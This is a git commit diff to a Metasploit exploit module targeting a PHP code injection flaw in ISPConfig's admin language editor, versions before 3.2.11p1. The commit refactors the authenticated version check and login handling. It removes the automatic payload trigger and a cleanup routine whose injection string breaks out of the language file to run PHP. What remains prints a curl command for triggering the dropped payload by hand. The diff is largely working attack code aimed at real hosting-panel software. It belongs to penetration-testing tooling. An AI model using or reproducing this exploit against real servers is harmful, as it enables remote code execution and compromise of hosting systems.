removed: unused imports, and functions, removed: falsey statements, resolved: changes

happybear-21 · happybear-21 · commit 47f2ba2861e1 · 2025-06-30T20:34:17.000+05:30
diff --git a/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb b/modules/exploits/linux/http/ispconfig_lang_edit_php_code_injection.rb
@@ -8,7 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
     super(
@@ -70,53 +69,46 @@ def initialize(info = {})
       OptString.new('USERNAME', [true, 'ISPConfig administrator username']),
       OptString.new('PASSWORD', [true, 'ISPConfig administrator password'])
     ])
-    
-    @authenticated = false
   end
 
   def check
     print_status('Checking if the target is ISPConfig...')
+    # Always try to log in and parse version, since credentials are required
+    # Clear any existing cookies before login
+    cookie_jar.clear
     
-    # Try to log in and parse version if credentials are provided
-    if datastore['USERNAME'] && datastore['PASSWORD']
-      # Clear any existing cookies before login
-      cookie_jar.clear
-      
-      login_res = send_request_cgi!({
-        'method' => 'POST',
-        'uri' => normalize_uri(target_uri.path, 'login/'),
-        'vars_post' => {
-          'username' => datastore['USERNAME'],
-          'password' => datastore['PASSWORD'],
-          's_mod' => 'login'
-        },
+    login_res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'login/'),
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        's_mod' => 'login'
+      },
+      'keep_cookies' => true
+    })
+    if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
+      # Try to access the dashboard or settings page
+      settings_res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
         'keep_cookies' => true
       })
-      if login_res && (login_res.headers['Location']&.include?('admin') || login_res.body.downcase.include?('dashboard'))
-        # Try to access the dashboard or settings page
-        settings_res = send_request_cgi({
-          'method' => 'GET',
-          'uri' => normalize_uri(target_uri.path, 'help', 'version.php'),
-          'keep_cookies' => true
-        })
-        if settings_res
-          doc = settings_res.get_html_document
-          # Try to find version in a span, div, or similar element
-          version_element = doc.at('//p[@class="frmTextHead"]')
-          if version_element
-            version_text = version_element.text
-            version = version_text.split(":")[1].gsub(" ","")
-            version = Rex::Version.new(version)
-            if version < Rex::Version.new('3.2.11p1')
-              print_good("ISPConfig version detected: #{version_text}")
-              @authenticated = true
-              return CheckCode::Vulnerable("Version: #{version_text}")
-            end
+      if settings_res
+        doc = settings_res.get_html_document
+        # Try to find version in a span, div, or similar element
+        version_element = doc.at('//p[@class="frmTextHead"]')
+        if version_element
+          version_text = version_element.text
+          version = version_text.split(":")[1].gsub(" ","")
+          version = Rex::Version.new(version)
+          if version < Rex::Version.new('3.2.11p1')
+            print_good("ISPConfig version detected: #{version_text}")
+            return CheckCode::Vulnerable("Version: #{version_text}")
           end
         end
       end
     end
-
     CheckCode::Safe
   end
 
@@ -162,10 +154,10 @@ def check_langedit_permission
       'keep_cookies' => true
     })
     
-    if res && res.code == 200 && res.body.include?('language_edit')
+    if res&.code == 200 && res.body.include?('language_edit')
       print_good('Language editor is accessible - admin_allow_langedit appears to be enabled')
       return true
-    elsif res && res.code == 403
+    elsif res&.code == 403
       print_warning('Language editor access denied - admin_allow_langedit may be disabled')
       return false
     else
@@ -269,66 +261,9 @@ def inject_payload
     return payload_url
   end
 
-  def trigger_payload(payload_url)
-    print_status('Triggering PHP payload...')
-    # Small delay to ensure the file is written
-    sleep(1)
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => payload_url,
-      'keep_cookies' => true
-    })
-    if res&.code == 200
-      print_good('PHP payload triggered successfully')
-    else
-      print_warning('Payload trigger response was unexpected')
-    end
-  end
-
-  def cleanup
-    return unless @payload_file
-    print_status('Cleaning up payload file...')
-    # Use the same vulnerability to delete the file
-    injection = "'];unlink('#{@payload_file}');die;#"
-    lang_file = Rex::Text.rand_text_alpha_lower(10) + ".lng"
-    edit_url = normalize_uri(target_uri.path, 'admin', 'language_edit.php')
-    initial_data = {
-      'lang' => 'en',
-      'module' => 'help',
-      'lang_file' => lang_file
-    }
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => edit_url,
-      'vars_post' => initial_data,
-      'keep_cookies' => true
-    })
-    return unless res
-    doc = res.get_html_document
-    csrf_id = doc.at('input[name="_csrf_id"]')&.[]('value')
-    csrf_key = doc.at('input[name="_csrf_key"]')&.[]('value')
-    return unless csrf_id && csrf_key
-    injection_data = {
-      'lang' => 'en',
-      'module' => 'help',
-      'lang_file' => lang_file,
-      '_csrf_id' => csrf_id,
-      '_csrf_key' => csrf_key,
-      'records[\\]' => injection
-    }
-    send_request_cgi({
-      'method' => 'POST',
-      'uri' => edit_url,
-      'vars_post' => injection_data,
-      'keep_cookies' => true
-    })
-    print_good("Payload file #{@payload_file} cleaned up")
-  end
-
   def exploit
-    unless @authenticated
-      authenticate
-      @authenticated = true
+    unless authenticate
+      fail_with(Failure::NoAccess, 'Login failed')
     end
     
     # Check if language editor permissions are enabled
@@ -349,7 +284,6 @@ def exploit
     
     payload_url = inject_payload
     print_status('Starting payload handler...')
-    trigger_payload(payload_url)
     print_status('Manual trigger information:')
     print_line("URL: #{full_uri}#{payload_url}")
     print_line("Manual trigger: curl '#{full_uri}#{payload_url}'")
